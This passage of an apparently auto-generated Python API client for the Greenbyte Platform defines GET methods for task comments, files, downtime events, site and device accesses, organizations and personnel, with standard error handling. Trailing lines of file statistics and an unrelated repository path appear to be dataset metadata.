list_task_comments(self, task_id, fields=None, page_size=50, page=1, use_utc=False): """Does a GET request to /tasks/{taskId}/comments. **(BETA)** Gets a list of comments belonging to a task. _🔐 This endpoint requires the **Plan** endpoint permission._ _This is a beta feature. Some details might change before it is released as a stable version._ Args: task_id (int): The id of the task. fields (list of string, optional): Which fields to include in the response. Valid fields are those defined in the `TaskComment` schema (See Response Type). By default all fields are included. page_size (int, optional): The number of items to return per page. page (int, optional): Which page to return when the number of items exceed the page size. use_utc (bool, optional): Set to true to get timestamps in UTC. Returns: list of TaskComment: Response from the API. A list of comments belonging to the task. Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ # Prepare query URL _url_path = '/tasks/{taskId}/comments' _url_path = APIHelper.append_url_with_template_parameters(_url_path, { 'taskId': task_id }) _query_builder = Configuration.get_base_uri() _query_builder += _url_path _query_parameters = { 'fields': fields, 'pageSize': page_size, 'page': page, 'useUtc': use_utc } _query_builder = APIHelper.append_url_with_query_parameters(_query_builder, _query_parameters, Configuration.array_serialization) _query_url = APIHelper.clean_url(_query_builder) # Prepare headers _headers = { 'accept': 'application/json' } # Prepare and execute request _request = self.http_client.get(_query_url, headers=_headers) CustomHeaderAuth.apply(_request) _context = self.execute_request(_request) # Endpoint and global error handling using HTTP status codes. if _context.response.status_code == 400: raise ProblemDetailsException('The request cannot be fulfilled due to bad syntax.', _context) elif _context.response.status_code == 401: raise APIException('The request is missing a valid API key. ', _context) elif _context.response.status_code == 403: raise APIException('One of the following: * The API key does not authorize access to the requested endpoint because of a missing endpoint permission. * The API key does not authorize access to the requested data. Devices, sites or data signals can be limited. ', _context) elif _context.response.status_code == 405: raise APIException('The HTTP method is not allowed for the endpoint.', _context) elif _context.response.status_code == 429: raise ProblemDetailsException('The API key has been used in too many requests in a given amount of time. The following headers will be set in the response: * `X-Rate-Limit-Limit` – The rate limit period (for example "1m", "12h", or "1d"). * `X-Rate-Limit-Remaining` – The remaining number of requests for this period. * `X-Rate-Limit-Reset` – The UTC timestamp string (in ISO 8601 format) when the remaining number of requests resets. The limit is currently 1,000 requests/minute per API key and IP address. ', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, TaskComment.from_dictionary) def list_task_files(self, task_id, fields=None, page_size=50, page=1, use_utc=False): """Does a GET request to /tasks/{taskId}/files. **(BETA)** Gets a list of files belonging to a task. _🔐 This endpoint requires the **Plan** endpoint permission._ _This is a beta feature. Some details might change before it is released as a stable version._ Args: task_id (int): The id of the task. fields (list of string, optional): Which fields to include in the response. Valid fields are those defined in the `TaskFile` schema (See Response Type). By default all fields are included. page_size (int, optional): The number of items to return per page. page (int, optional): Which page to return when the number of items exceed the page size. use_utc (bool, optional): Set to true to get timestamps in UTC. Returns: list of TasksFilesResponse: Response from the API. A list with information about files belonging to the task. Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ # Prepare query URL _url_path = '/tasks/{taskId}/files' _url_path = APIHelper.append_url_with_template_parameters(_url_path, { 'taskId': task_id }) _query_builder = Configuration.get_base_uri() _query_builder += _url_path _query_parameters = { 'fields': fields, 'pageSize': page_size, 'page': page, 'useUtc': use_utc } _query_builder = APIHelper.append_url_with_query_parameters(_query_builder, _query_parameters, Configuration.array_serialization) _query_url = APIHelper.clean_url(_query_builder) # Prepare headers _headers = { 'accept': 'application/json' } # Prepare and execute request _request = self.http_client.get(_query_url, headers=_headers) CustomHeaderAuth.apply(_request) _context = self.execute_request(_request) # Endpoint and global error handling using HTTP status codes. if _context.response.status_code == 400: raise ProblemDetailsException('The request cannot be fulfilled due to bad syntax.', _context) elif _context.response.status_code == 401: raise APIException('The request is missing a valid API key. ', _context) elif _context.response.status_code == 403: raise APIException('One of the following: * The API key does not authorize access to the requested endpoint because of a missing endpoint permission. * The API key does not authorize access to the requested data. Devices, sites or data signals can be limited. ', _context) elif _context.response.status_code == 404: raise APIException('The requested resource could not be found.', _context) elif _context.response.status_code == 405: raise APIException('The HTTP method is not allowed for the endpoint.', _context) elif _context.response.status_code == 429: raise ProblemDetailsException('The API key has been used in too many requests in a given amount of time. The following headers will be set in the response: * `X-Rate-Limit-Limit` – The rate limit period (for example "1m", "12h", or "1d"). * `X-Rate-Limit-Remaining` – The remaining number of requests for this period. * `X-Rate-Limit-Reset` – The UTC timestamp string (in ISO 8601 format) when the remaining number of requests resets. The limit is currently 1,000 requests/minute per API key and IP address. ', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, TasksFilesResponse.from_dictionary) def download_task_file(self, task_id, file_id): """Does a GET request to /tasks/{taskId}/files/{fileId}/content. **(BETA)** Downloads a file belonging to a task. _🔐 This endpoint requires the **Plan** endpoint permission._ _This is a beta feature. Some details might change before it is released as a stable version._ Args: task_id (int): The id of the task. file_id (int): The id of the file. Returns: binary: Response from the API. The contents of a file linked to the task. Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ # Prepare query URL _url_path = '/tasks/{taskId}/files/{fileId}/content' _url_path = APIHelper.append_url_with_template_parameters(_url_path, { 'taskId': task_id, 'fileId': file_id }) _query_builder = Configuration.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare and execute request _request = self.http_client.get(_query_url) CustomHeaderAuth.apply(_request) _context = self.execute_request(_request, binary = True) # Endpoint and global error handling using HTTP status codes. if _context.response.status_code == 400: raise ProblemDetailsException('The request cannot be fulfilled due to bad syntax.', _context) elif _context.response.status_code == 401: raise APIException('The request is missing a valid API key. ', _context) elif _context.response.status_code == 403: raise APIException('One of the following: * The API key does not authorize access to the requested endpoint because of a missing endpoint permission. * The API key does not authorize access to the requested data. Devices, sites or data signals can be limited. ', _context) elif _context.response.status_code == 404: raise APIException('The requested resource could not be found.', _context) elif _context.response.status_code == 405: raise APIException('The HTTP method is not allowed for the endpoint.', _context) elif _context.response.status_code == 429: raise ProblemDetailsException('The API key has been used in too many requests in a given amount of time. The following headers will be set in the response: * `X-Rate-Limit-Limit` – The rate limit period (for example "1m", "12h", or "1d"). * `X-Rate-Limit-Remaining` – The remaining number of requests for this period. * `X-Rate-Limit-Reset` – The UTC timestamp string (in ISO 8601 format) when the remaining number of requests resets. The limit is currently 1,000 requests/minute per API key and IP address. ', _context) self.validate_response(_context) # Return appropriate type return _context.response.raw_body def list_downtime_events(self, timestamp_start, timestamp_end, device_ids=None, site_ids=None, fields=None, page_size=50, page=1, use_utc=False): """Does a GET request to /downtime-events. **(BETA)** Gets a list of downtime events. _🔐 This endpoint requires the **Plan** endpoint permission._ _This is a beta feature. Some details might change before it is released as a stable version._ Args: timestamp_start (datetime): The beginning of the time interval to get data for (inclusive), in [RFC 3339, section 5.6](https://tools.ietf.org/html/rfc3339#section-5.6) **date-time** format: * Timestamps ending with 'Z' are treated as UTC. Example: "2020-01-01T00:00:00Z" * Time zone (UTC) offset timestamps ending with '+HH:mm'/"-HH:mm" are also supported. Example: "2020-01-01T02:00:00-02:00" * Other timestamps are treated as being in the time zone configured in the Greenbyte Platform. Example: "2020-01-01T00:00:00" The start timestamp **is** included in the time interval: for example, to select the full month of March 2020, set `timestampStart` to "2020-03-01T00:00:00" and `timestampEnd` to "2020-04-01T00:00:00". timestamp_end (datetime): The end of the time interval to get data for (exclusive), in [RFC 3339, section 5.6](https://tools.ietf.org/html/rfc3339#section-5.6) **date-time** format: * Timestamps ending with 'Z' are treated as UTC. Example: "2020-01-01T00:00:00Z" * Time zone (UTC) offset timestamps ending with '+HH:mm'/"-HH:mm" are also supported. Example: "2020-01-01T02:00:00-02:00" * Other timestamps are treated as being in the time zone configured in the Greenbyte Platform. Example: "2020-01-01T00:00:00" The end timestamp is **not** included in the time interval: for example, to select the full month of March 2020, set `timestampStart` to "2020-03-01T00:00:00" and `timestampEnd` to "2020-04-01T00:00:00". device_ids (list of int, optional): What devices to get downtime events for. site_ids (list of int, optional): What sites to get downtime events for. fields (list of string, optional): Which fields to include in the response. Valid fields are those defined in the `DowntimeEvent` schema (See Response Type). By default all fields are included. page_size (int, optional): The number of items to return per page. page (int, optional): Which page to return when the number of items exceed the page size. use_utc (bool, optional): Set to true to get timestamps in UTC. Returns: list of DowntimeEvent: Response from the API. A list of downtime events matching the filter parameters. Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ # Prepare query URL _url_path = '/downtime-events' _query_builder = Configuration.get_base_uri() _query_builder += _url_path _query_parameters = { 'timestampStart': APIHelper.when_defined(APIHelper.RFC3339DateTime, timestamp_start), 'timestampEnd': APIHelper.when_defined(APIHelper.RFC3339DateTime, timestamp_end), 'deviceIds': device_ids, 'siteIds': site_ids, 'fields': fields, 'pageSize': page_size, 'page': page, 'useUtc': use_utc } _query_builder = APIHelper.append_url_with_query_parameters(_query_builder, _query_parameters, Configuration.array_serialization) _query_url = APIHelper.clean_url(_query_builder) # Prepare headers _headers = { 'accept': 'application/json' } # Prepare and execute request _request = self.http_client.get(_query_url, headers=_headers) CustomHeaderAuth.apply(_request) _context = self.execute_request(_request) # Endpoint and global error handling using HTTP status codes. if _context.response.status_code == 400: raise ProblemDetailsException('The request cannot be fulfilled due to bad syntax.', _context) elif _context.response.status_code == 401: raise APIException('The request is missing a valid API key. ', _context) elif _context.response.status_code == 403: raise APIException('One of the following: * The API key does not authorize access to the requested endpoint because of a missing endpoint permission. * The API key does not authorize access to the requested data. Devices, sites or data signals can be limited. ', _context) elif _context.response.status_code == 405: raise APIException('The HTTP method is not allowed for the endpoint.', _context) elif _context.response.status_code == 429: raise ProblemDetailsException('The API key has been used in too many requests in a given amount of time. The following headers will be set in the response: * `X-Rate-Limit-Limit` – The rate limit period (for example "1m", "12h", or "1d"). * `X-Rate-Limit-Remaining` – The remaining number of requests for this period. * `X-Rate-Limit-Reset` – The UTC timestamp string (in ISO 8601 format) when the remaining number of requests resets. The limit is currently 1,000 requests/minute per API key and IP address. ', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, DowntimeEvent.from_dictionary) def list_site_accesses(self, timestamp_start, timestamp_end, device_ids=None, site_ids=None, fields=None, page_size=50, page=1, use_utc=False): """Does a GET request to /site-accesses. **(BETA)** Gets a list of site accesses. _🔐 This endpoint requires the **Plan** endpoint permission._ _This is a beta feature. Some details might change before it is released as a stable version._ Args: timestamp_start (datetime): The beginning of the time interval to get data for (inclusive), in [RFC 3339, section 5.6](https://tools.ietf.org/html/rfc3339#section-5.6) **date-time** format: * Timestamps ending with 'Z' are treated as UTC. Example: "2020-01-01T00:00:00Z" * Time zone (UTC) offset timestamps ending with '+HH:mm'/"-HH:mm" are also supported. Example: "2020-01-01T02:00:00-02:00" * Other timestamps are treated as being in the time zone configured in the Greenbyte Platform. Example: "2020-01-01T00:00:00" The start timestamp **is** included in the time interval: for example, to select the full month of March 2020, set `timestampStart` to "2020-03-01T00:00:00" and `timestampEnd` to "2020-04-01T00:00:00". timestamp_end (datetime): The end of the time interval to get data for (exclusive), in [RFC 3339, section 5.6](https://tools.ietf.org/html/rfc3339#section-5.6) **date-time** format: * Timestamps ending with 'Z' are treated as UTC. Example: "2020-01-01T00:00:00Z" * Time zone (UTC) offset timestamps ending with '+HH:mm'/"-HH:mm" are also supported. Example: "2020-01-01T02:00:00-02:00" * Other timestamps are treated as being in the time zone configured in the Greenbyte Platform. Example: "2020-01-01T00:00:00" The end timestamp is **not** included in the time interval: for example, to select the full month of March 2020, set `timestampStart` to "2020-03-01T00:00:00" and `timestampEnd` to "2020-04-01T00:00:00". device_ids (list of int, optional): What devices to get site accesses for. site_ids (list of int, optional): What sites to get site accesses for. fields (list of string, optional): Which fields to include in the response. Valid fields are those defined in the `SiteAccess` schema (See Response Type). By default all fields are included. page_size (int, optional): The number of items to return per page. page (int, optional): Which page to return when the number of items exceed the page size. use_utc (bool, optional): Set to true to get timestamps in UTC. Returns: list of SiteAccess: Response from the API. A list of site accesses matching the filter parameters. Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ # Prepare query URL _url_path = '/site-accesses' _query_builder = Configuration.get_base_uri() _query_builder += _url_path _query_parameters = { 'timestampStart': APIHelper.when_defined(APIHelper.RFC3339DateTime, timestamp_start), 'timestampEnd': APIHelper.when_defined(APIHelper.RFC3339DateTime, timestamp_end), 'deviceIds': device_ids, 'siteIds': site_ids, 'fields': fields, 'pageSize': page_size, 'page': page, 'useUtc': use_utc } _query_builder = APIHelper.append_url_with_query_parameters(_query_builder, _query_parameters, Configuration.array_serialization) _query_url = APIHelper.clean_url(_query_builder) # Prepare headers _headers = { 'accept': 'application/json' } # Prepare and execute request _request = self.http_client.get(_query_url, headers=_headers) CustomHeaderAuth.apply(_request) _context = self.execute_request(_request) # Endpoint and global error handling using HTTP status codes. if _context.response.status_code == 400: raise ProblemDetailsException('The request cannot be fulfilled due to bad syntax.', _context) elif _context.response.status_code == 401: raise APIException('The request is missing a valid API key. ', _context) elif _context.response.status_code == 403: raise APIException('One of the following: * The API key does not authorize access to the requested endpoint because of a missing endpoint permission. * The API key does not authorize access to the requested data. Devices, sites or data signals can be limited. ', _context) elif _context.response.status_code == 405: raise APIException('The HTTP method is not allowed for the endpoint.', _context) elif _context.response.status_code == 429: raise ProblemDetailsException('The API key has been used in too many requests in a given amount of time. The following headers will be set in the response: * `X-Rate-Limit-Limit` – The rate limit period (for example "1m", "12h", or "1d"). * `X-Rate-Limit-Remaining` – The remaining number of requests for this period. * `X-Rate-Limit-Reset` – The UTC timestamp string (in ISO 8601 format) when the remaining number of requests resets. The limit is currently 1,000 requests/minute per API key and IP address. ', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, SiteAccess.from_dictionary) def list_device_accesses(self, site_access_id, fields=None, page_size=50, page=1, use_utc=False): """Does a GET request to /site-accesses/{siteAccessId}/device-accesses. **(BETA)** Gets a list of device accesses belonging to a site access. _🔐 This endpoint requires the **Plan** endpoint permission._ _This is a beta feature. Some details might change before it is released as a stable version._ Args: site_access_id (int): The id of the site access. fields (list of string, optional): Which fields to include in the response. Valid fields are those defined in the `DeviceAccess` schema (See Response Type). By default all fields are included. page_size (int, optional): The number of items to return per page. page (int, optional): Which page to return when the number of items exceed the page size. use_utc (bool, optional): Set to true to get timestamps in UTC. Returns: list of DeviceAccess: Response from the API. A list of device accesses. Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ # Prepare query URL _url_path = '/site-accesses/{siteAccessId}/device-accesses' _url_path = APIHelper.append_url_with_template_parameters(_url_path, { 'siteAccessId': site_access_id }) _query_builder = Configuration.get_base_uri() _query_builder += _url_path _query_parameters = { 'fields': fields, 'pageSize': page_size, 'page': page, 'useUtc': use_utc } _query_builder = APIHelper.append_url_with_query_parameters(_query_builder, _query_parameters, Configuration.array_serialization) _query_url = APIHelper.clean_url(_query_builder) # Prepare headers _headers = { 'accept': 'application/json' } # Prepare and execute request _request = self.http_client.get(_query_url, headers=_headers) CustomHeaderAuth.apply(_request) _context = self.execute_request(_request) # Endpoint and global error handling using HTTP status codes. if _context.response.status_code == 400: raise ProblemDetailsException('The request cannot be fulfilled due to bad syntax.', _context) elif _context.response.status_code == 401: raise APIException('The request is missing a valid API key. ', _context) elif _context.response.status_code == 403: raise APIException('One of the following: * The API key does not authorize access to the requested endpoint because of a missing endpoint permission. * The API key does not authorize access to the requested data. Devices, sites or data signals can be limited. ', _context) elif _context.response.status_code == 404: raise APIException('The requested resource could not be found.', _context) elif _context.response.status_code == 405: raise APIException('The HTTP method is not allowed for the endpoint.', _context) elif _context.response.status_code == 429: raise ProblemDetailsException('The API key has been used in too many requests in a given amount of time. The following headers will be set in the response: * `X-Rate-Limit-Limit` – The rate limit period (for example "1m", "12h", or "1d"). * `X-Rate-Limit-Remaining` – The remaining number of requests for this period. * `X-Rate-Limit-Reset` – The UTC timestamp string (in ISO 8601 format) when the remaining number of requests resets. The limit is currently 1,000 requests/minute per API key and IP address. ', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, DeviceAccess.from_dictionary) def list_organizations(self): """Does a GET request to /organizations. **(BETA)** Gets a list of organizations. _🔐 This endpoint requires the **Plan** endpoint permission._ _This is a beta feature. Some details might change before it is released as a stable version._ Returns: list of Organization: Response from the API. A list of organizations. Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ # Prepare query URL _url_path = '/organizations' _query_builder = Configuration.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers _headers = { 'accept': 'application/json' } # Prepare and execute request _request = self.http_client.get(_query_url, headers=_headers) CustomHeaderAuth.apply(_request) _context = self.execute_request(_request) # Endpoint and global error handling using HTTP status codes. if _context.response.status_code == 400: raise ProblemDetailsException('The request cannot be fulfilled due to bad syntax.', _context) elif _context.response.status_code == 401: raise APIException('The request is missing a valid API key. ', _context) elif _context.response.status_code == 403: raise APIException('One of the following: * The API key does not authorize access to the requested endpoint because of a missing endpoint permission. * The API key does not authorize access to the requested data. Devices, sites or data signals can be limited. ', _context) elif _context.response.status_code == 405: raise APIException('The HTTP method is not allowed for the endpoint.', _context) elif _context.response.status_code == 429: raise ProblemDetailsException('The API key has been used in too many requests in a given amount of time. The following headers will be set in the response: * `X-Rate-Limit-Limit` – The rate limit period (for example "1m", "12h", or "1d"). * `X-Rate-Limit-Remaining` – The remaining number of requests for this period. * `X-Rate-Limit-Reset` – The UTC timestamp string (in ISO 8601 format) when the remaining number of requests resets. The limit is currently 1,000 requests/minute per API key and IP address. ', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, Organization.from_dictionary) def list_personnel(self, fields=None, page_size=50, page=1): """Does a GET request to /personnel. **(BETA)** Gets a list of personnel. _🔐 This endpoint requires the **Plan** endpoint permission._ _This is a beta feature. Some details might change before it is released as a stable version._ Args: fields (list of string, optional): Which fields to include in the response. Valid fields are those defined in the `Personnel` schema (See Response Type). By default all fields are included. page_size (int, optional): The number of items to return per page. page (int, optional): Which page to return when the number of items exceed the page size. Returns: list of Personnel: Response from the API. A list of personnel matching the filter parameters. Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ # Prepare query URL _url_path = '/personnel' _query_builder = Configuration.get_base_uri() _query_builder += _url_path _query_parameters = { 'fields': fields, 'pageSize': page_size, 'page': page } _query_builder = APIHelper.append_url_with_query_parameters(_query_builder, _query_parameters, Configuration.array_serialization) _query_url = APIHelper.clean_url(_query_builder) # Prepare headers _headers = { 'accept': 'application/json' } # Prepare and execute request _request = self.http_client.get(_query_url, headers=_headers) CustomHeaderAuth.apply(_request) _context = self.execute_request(_request) # Endpoint and global error handling using HTTP status codes. if _context.response.status_code == 400: raise ProblemDetailsException('The request cannot be fulfilled due to bad syntax.', _context) elif _context.response.status_code == 401: raise APIException('The request is missing a valid API key. ', _context) elif _context.response.status_code == 403: raise APIException('One of the following: * The API key does not authorize access to the requested endpoint because of a missing endpoint permission. * The API key does not authorize access to the requested data. Devices, sites or data signals can be limited. ', _context) elif _context.response.status_code == 405: raise APIException('The HTTP method is not allowed for the endpoint.', _context) elif _context.response.status_code == 429: raise ProblemDetailsException('The API key has been used in too many requests in a given amount of time. The following headers will be set in the response: * `X-Rate-Limit-Limit` – The rate limit period (for example "1m", "12h", or "1d"). * `X-Rate-Limit-Remaining` – The remaining number of requests for this period. * `X-Rate-Limit-Reset` – The UTC timestamp string (in ISO 8601 format) when the remaining number of requests resets. The limit is currently 1,000 requests/minute per API key and IP address. ', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, Personnel.from_dictionary)
53.74356
539
0.63697
5,686
45,897
5.014773
0.055751
0.033142
0.039033
0.046468
0.925861
0.911131
0.904819
0.896928
0.893491
0.893491
0
0.026711
0.292786
45,897
853
540
53.806565
0.850519
0.36303
0
0.801061
1
0.05305
0.355209
0.013777
0
0
0
0
0
1
0.026525
false
0
0.039788
0
0.095491
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
abed9e0807ab81cccb1658e1196fda0a9ed8d04b
9,622
py
Python
Parser.py
oxford-pcs/zController
579946dfc4750a892d368508198324011aec6bed
[ "MIT" ]
5
2018-01-16T14:16:10.000Z
2021-07-13T03:45:57.000Z
Parser.py
oxford-pcs/zemax_controller
579946dfc4750a892d368508198324011aec6bed
[ "MIT" ]
null
null
null
Parser.py
oxford-pcs/zemax_controller
579946dfc4750a892d368508198324011aec6bed
[ "MIT" ]
1
2021-04-28T11:54:59.000Z
2021-04-28T11:54:59.000Z
import codecs from decimal import * import numpy as np import pylab as plt def decode(fname, encoding): ''' Decode file with given encoding. ''' fp = codecs.open(fname, "r", encoding) content = fp.readlines() fp.close() return content class zCFFftPsf(): ''' Parse a Zemax FFT PSF output file. ''' def __init__(self, fname, verbose=True, debug=False): self.fname = fname self.header = {"WAVE": None, "FIELD": None, "WAVE_EXP": None, "DATA_SPACING": None, "DATA_SPACING_EXP": None, "DATA_AREA": None, "DATA_AREA_EXP": None, "PGRID_SIZE": None, "IGRID_SIZE": None, "CENTRE": None} self.data = None self.verbose = verbose self.debug = debug def _parseFileData(self, sampling): ''' Read file data into a Numpy array. ''' content = decode(self.fname, "UTF-16-LE") data = [] for idx, line in enumerate(content): try: if idx>=18: data.append([float(i.rstrip('\r\n')) for i in line.split('\t')]) except TypeError: # some non-floatable value has been found return False self.data = np.array(data) if not sampling == self.data.shape: # not the same as expected sampling return False return True def _parseFileHeader(self): ''' Read file header contents into a dict. ''' content = decode(self.fname, "UTF-16-LE") for idx, line in enumerate(content): if idx == 8: self.header['WAVE'] = float(line.split()[0].strip()) if unicode(line.split()[1].rstrip(',').strip()) == u'm': self.header['WAVE_EXP'] = 1 if unicode(line.split()[1].rstrip(',').strip()) == u'mm': self.header['WAVE_EXP'] = 1e-3 elif unicode(line.split()[1].rstrip(',').strip()) == u'\xb5m': self.header['WAVE_EXP'] = 1e-6 elif unicode(line.split()[1].rstrip(',').strip()) == u'nm': self.header['WAVE_EXP'] = 1e-9 # need the following as Zemax writes a zero X field as a single # value, but a zero Y field is written still as (X, 0.) try: self.header['FIELD'] = (float(line.split()[3].rstrip(',').strip()), float(line.split()[4].strip())) except ValueError: self.header['FIELD'] = (0, float(line.split()[3].strip())) elif idx == 9: self.header['DATA_SPACING'] = float(line.split()[3].strip()) if unicode(line.split()[4].rstrip('.').strip()) == u'm': self.header['DATA_SPACING_EXP'] = 1 if unicode(line.split()[4].rstrip('.').strip()) == u'mm': self.header['DATA_SPACING_EXP'] = 1e-3 elif unicode(line.split()[4].rstrip('.').strip()) == u'\xb5m': self.header['DATA_SPACING_EXP'] = 1e-6 elif unicode(line.split()[4].rstrip('.').strip()) == u'nm': self.header['DATA_SPACING_EXP'] = 1e-9 elif idx == 10: self.header['DATA_AREA'] = float(line.split()[3].strip()) if unicode(line.split()[4].strip()) == u'm': self.header['DATA_AREA_EXP'] = 1 if unicode(line.split()[4].strip()) == u'mm': self.header['DATA_AREA_EXP'] = 1e-3 elif unicode(line.split()[4].strip()) == u'\xb5m': self.header['DATA_AREA_EXP'] = 1e-6 elif unicode(line.split()[4].strip()) == u'nm': self.header['DATA_AREA_EXP'] = 1e-9 elif idx == 13: self.header['PGRID_SIZE'] = (int(line.split()[3].strip()), int(line.split()[5].strip())) elif idx == 14: self.header['IGRID_SIZE'] = (int(line.split()[3].strip()), int(line.split()[5].strip())) elif idx == 15: self.header['CENTRE'] = (int(line.split()[4].rstrip(',').strip()), int(line.split()[6].strip())) if None in self.header.viewvalues(): # it's fully populated return False return True def getData(self): return np.array(self.data) def getHeader(self): return self.header def parse(self): ''' Parse the file fully. ''' if self._parseFileHeader(): if self.verbose: print "Successfully parsed ZEMAX FFT PSF output file header." if self.debug: print self.header if self._parseFileData(self.header['IGRID_SIZE']): if self.debug: plt.imshow(self.data) plt.colorbar() plt.show() if self.verbose: print "Successfully parsed ZEMAX FFT PSF output file data." else: print "Failed to parse ZEMAX FFT PSF output file data." return False else: print "Failed to read ZEMAX FFT PSF output file header." return False return True class zCSystemData(): ''' Parse a Zemax FFT PSF system data file. ''' def __init__(self, fname, verbose=True, debug=False): self.fname = fname self.header = {"WFNO": None, "EPD": None} self.verbose = verbose self.debug = debug self._parse() def _parseFileHeader(self): ''' Read file header contents into a dict. ''' content = decode(self.fname, "UTF-16-LE") for idx, line in enumerate(content): if len(line.split(':')) >= 2: if "Working F/#" in line.split(':')[0]: self.header['WFNO'] = float(line.split(':')[1].strip()) elif "Entrance Pupil Diameter" in line.split(':')[0]: self.header['EPD'] = float(line.split(':')[1].strip()) if None in self.header.viewvalues(): # it's fully populated return False return True def getHeader(self): return self.header def parse(self): ''' Parse the file fully. ''' if self._parseFileHeader(): if self.verbose: print "Successfully parsed ZEMAX system data file header." if self.debug: print self.header else: print "Failed to parse ZEMAX system data file header." return False class zCWFE(): ''' Parse a Zemax wavefront error map. ''' def __init__(self, fname, verbose=True, debug=False): self.fname = fname self.header = {"WAVE": None, "FIELD": None, "WAVE_EXP": None, "P2V": None, "RMS": None, "EXIT_PUPIL_DIAMETER": None, "SAMPLING": None, "CENTRE": None} self.data = None self.verbose = verbose self.debug = debug def _parseFileData(self, sampling): ''' Read file data into a Numpy array. ''' content = decode(self.fname, "UTF-16-LE") data = [] for idx, line in enumerate(content): try: if idx>=16: data.append([float(i.rstrip('\r\n')) for i in line.split('\t')]) except TypeError: # some non-floatable value has been found return False self.data = np.array(data) if not sampling == self.data.shape: # not the same as expected sampling return False return True def _parseFileHeader(self): ''' Read file header contents into a dict. ''' content = decode(self.fname, "UTF-16-LE") for idx, line in enumerate(content): if idx == 8: self.header['WAVE'] = Decimal(line.split()[0].strip()) if unicode(line.split()[1].rstrip(',').strip()) == u'm': self.header['WAVE_EXP'] = Decimal('1') if unicode(line.split()[1].rstrip(',').strip()) == u'mm': self.header['WAVE_EXP'] = Decimal('1e-3') elif unicode(line.split()[1].rstrip(',').strip()) == u'\xb5m': self.header['WAVE_EXP'] = Decimal('1e-6') elif unicode(line.split()[1].rstrip(',').strip()) == u'nm': self.header['WAVE_EXP'] = Decimal('1e-9') # need the following as Zemax writes a zero X field as a single # value, but a zero Y field is written still as (X, 0.) try: self.header['FIELD'] = (float(line.split()[3].rstrip(',').strip()), float(line.split()[4].strip())) except ValueError: self.header['FIELD'] = (0, float(line.split()[3].strip())) elif idx == 9: self.header['P2V'] = float(line.split()[4].strip()) self.header['RMS'] = float(line.split()[8].strip()) elif idx == 11: self.header['EXIT_PUPIL_DIAMETER'] = float(line.split()[3].strip()) self.header['EXIT_PUPIL_DIAMETER_UNIT'] = str(line.split()[4].strip()) if idx == 13: self.header['SAMPLING'] = (int(line.split()[3].strip()), int(line.split()[5].strip())) if idx == 14: self.header['CENTRE'] = (int(line.split()[4].rstrip(',').strip()), int(line.split()[6].strip())) if None in self.header.viewvalues(): # it's fully populated return False return True def getData(self): return self.data def getHeader(self): return self.header def parse(self): ''' Parse a file fully. ''' if self._parseFileHeader(): if self.verbose: print "Successfully parsed ZEMAX WFE output file header." if self.debug: print self.header if self._parseFileData(self.header['SAMPLING']): if self.debug: plt.imshow(self.data) plt.colorbar() plt.show() if self.verbose: print "Successfully parsed ZEMAX WFE output file data." else: print "Failed to parse ZEMAX WFE output file data." return False else: print "Failed to read ZEMAX WFE output file header." return False return True
34.736462
79
0.557369
1,231
9,622
4.300569
0.130788
0.092558
0.048357
0.027201
0.873442
0.828296
0.775973
0.745561
0.705705
0.693993
0
0.016676
0.283309
9,622
276
80
34.862319
0.751015
0.046664
0
0.607477
0
0
0.133263
0.002798
0
0
0
0
0
0
null
null
0
0.018692
null
null
0.060748
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
7
052d08d42ea8e5aabe39ae5d494e8bfa1403a369
125
py
Python
bunny/models/__init__.py
senpai-development/SenpaiSlasher
89842e584b4cd60731ce9c43315c08b02a8dc8e3
[ "MIT" ]
null
null
null
bunny/models/__init__.py
senpai-development/SenpaiSlasher
89842e584b4cd60731ce9c43315c08b02a8dc8e3
[ "MIT" ]
null
null
null
bunny/models/__init__.py
senpai-development/SenpaiSlasher
89842e584b4cd60731ce9c43315c08b02a8dc8e3
[ "MIT" ]
1
2021-10-31T02:40:03.000Z
2021-10-31T02:40:03.000Z
from .command import * # noqa: F401 F403 from .component import * # noqa: F401 F403 from .misc import * # noqa: F401 F403
31.25
43
0.688
18
125
4.777778
0.444444
0.348837
0.488372
0.627907
0.511628
0
0
0
0
0
0
0.183673
0.216
125
3
44
41.666667
0.693878
0.376
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
8
057c283405efc762b7ada4abca4131f219967673
2,818
py
Python
shell/core/shellcodes.py
vasco2016/shellsploit-framework
04eb4a0449acaba0b70c40a78c61a0d5e2527406
[ "MIT" ]
61
2017-06-13T13:48:38.000Z
2022-03-02T17:43:45.000Z
shell/core/shellcodes.py
